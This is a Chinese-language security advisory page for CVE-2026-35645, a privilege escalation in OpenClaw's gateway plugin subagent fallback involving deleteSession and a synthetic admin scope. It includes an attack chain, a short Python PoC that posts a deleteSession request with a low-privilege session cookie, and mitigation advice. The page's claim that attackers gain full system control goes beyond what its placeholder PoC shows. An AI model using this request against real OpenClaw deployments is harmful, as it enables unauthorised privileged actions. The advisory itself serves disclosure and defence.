IPBUF安全漏洞报告
English
CVE-2026-35645 CVSS 8.1 高危

CVE-2026-35645 OpenClaw权限提升漏洞

披露日期: 2026-04-09

漏洞信息

漏洞编号
CVE-2026-35645
漏洞类型
权限提升
CVSS评分
8.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

权限提升OpenClaw逻辑漏洞CVSS-8.1

漏洞概述

OpenClaw在2026.3.25之前的版本中存在一个严重的权限提升漏洞。该漏洞源于网关插件子代理回退机制中的deleteSession函数设计缺陷。由于该函数错误地使用了合成的operator.admin运行时范围,攻击者可以在没有请求范围客户端的情况下触发会话删除。这一逻辑漏洞使得低权限攻击者能够绕过安全检查,以非预期的管理员权限执行特权操作,从而完全控制系统。该漏洞对系统的完整性和可用性造成了极高的威胁,建议用户尽快修复。

技术细节

该漏洞的技术核心在于OpenClaw网关插件处理会话管理时的上下文权限验证逻辑缺失。具体来说,`deleteSession`函数在特定回退路径下被调用时,系统会自动赋予其`operator.admin`这一合成的高级运行时权限范围。正常情况下,此类操作应当严格绑定到具有明确管理权限的请求上下文客户端中。

攻击者利用此漏洞的过程非常隐蔽。首先,攻击者只需拥有较低权限的账户(满足CVSS PR:L要求),即可发起攻击。通过构造特定的数据包并调用网关接口,攻击者触发`deleteSession`函数。由于系统未校验当前客户端是否具备管理权限,该函数便继承了合成的管理员权限。这导致攻击者能够以管理员身份执行任意操作,如删除关键系统会话、篡改配置等,从而成功实现从低权限到高权限的跨越,严重破坏系统的安全防线。

攻击链分析

STEP 1
侦察阶段
攻击者识别目标系统运行的是OpenClaw且版本低于2026.3.25。
STEP 2
获取访问权
攻击者注册或获取一个低权限的用户账户及会话令牌。
STEP 3
漏洞利用
攻击者向网关插件子代理的回退接口发送特制请求,触发deleteSession函数。
STEP 4
权限提升
系统因逻辑缺陷,以合成的operator.admin范围执行该请求,赋予攻击者管理员权限。
STEP 5
执行操作
攻击者利用获得的管理员权限执行破坏完整性和可用性的操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit Title: OpenClaw Privilege Escalation via deleteSession # Description: This script triggers the vulnerable deleteSession function # to execute operations with synthetic operator.admin scope. target_url = "http://target-openclaw-instance/gateway/plugin/subagent/fallback" session_cookie = "valid_low_priv_session_token" # Low privilege user session headers = { "Cookie": f"session={session_cookie}", "Content-Type": "application/json" } # The payload triggers the deleteSession logic which falls back to operator.admin scope payload = { "action": "deleteSession", "sessionId": "target_session_to_delete_or_manipulate" } try: response = requests.post(target_url, json=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Privileged operation executed.") else: print("[-] Exploit failed.") except Exception as e: print(f"Error: {e}")

影响范围

OpenClaw < 2026.3.25

防御指南

临时缓解措施
建议立即检查OpenClaw版本,若低于2026.3.25,应尽快应用官方补丁。在无法立即升级的情况下,应严格限制对网关插件子代理接口的网络访问,并实施更严格的身份验证机制,确保只有受信任的客户端才能发起会话管理请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表